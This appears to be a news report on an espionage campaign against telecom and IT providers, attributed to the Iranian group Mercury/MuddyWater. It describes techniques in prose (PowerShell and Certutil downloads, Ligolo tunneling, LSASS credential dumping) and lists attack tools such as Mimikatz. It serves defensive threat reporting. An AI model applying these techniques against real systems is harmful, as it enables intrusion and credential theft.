A new espionage hacking campaign has been detected by the cybersecurity experts that are continuously targeting all the telecommunication and IT service providers especially in the Middle East and Asia.
After investigating the attack, the experts came to know that the threat actors are most likely connected to the Iranian threat actor team Mercury, and they have initiated an attack on a string of telecom operators.
However, the threat actor are operating this attack for over six months and they have initially targeted organizations from the following countries:-
- Saudi Arabia
- The United Arab Emirates
The very first telecom attack took place in August 2021, and it came to the spotlight because the security analyst found evidence of compromise was the outcome of service to establish an unknown Windows Script File (WSF).
The threat actors in this attack have used the PowerShell to download another WSF and run it, and not only this, but in this attack, the threat actors have also used Certutil to download a reckoned Ligolo tunneling tool.
The tool was downloaded to launch WMI, and it was later used to get all remote machines so that the threat actors can carry out all the planned tasks.
Tools and methods
In this type of attack, the threat actors generally use scripts extensively, and later they are used for gathering data and downloading additional tools. The threat actors have used the eHorus remote access tool, and it allows to some mentioned below things:-
- Deliver and run a Local Security Authority Subsystem Service (LSASS) dumping tool.
- Deliver Ligolo tunneling tools.
- Execute Certutil to ask for a URL from Exchange Web Services (EWS) of other targeted organizations.
However, the security analyst has listed all the tools used by the threat actors in this attack, and that’s why we have mentioned them below:-
- ScreenConnect: Legitimate remote administration tool
- RemoteUtilities: Legitimate remote administration tool
- eHorus: Legitimate remote administration tool
- Ligolo: Reverse tunneling tool
- Hidec: Command line tool for running a hidden window
- Nping: Packet generation tool
- LSASS Dumper: Tool that dumps credentials from Local Security Authority Subsystem Service (LSASS) process
- SharpChisel: Tunneling tool
- Password Dumper
- CrackMapExec: Publicly available tool that is used to automate security assessment of an Active Directory environment
- ProcDump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but which can also be used as a general process dump utility
- SOCKS5 proxy server: Tunneling tool
- Keylogger: Retrieves browser credentials
- Mimikatz: Publicly available credential dumping tool
Connections with MuddyWater
The whole attribution isn’t definitive, but still, the security analysts at Symantec have logged two IP addresses.
And after researching it properly, they came to know that both the IP address overlaps with the infrastructure that is generally used in MuddyWater attacks.
Though they are trying their best to know the key details,, the threat actors are switching the organization very fastly, and it becomes very difficult for the experts to get a proper conclusion.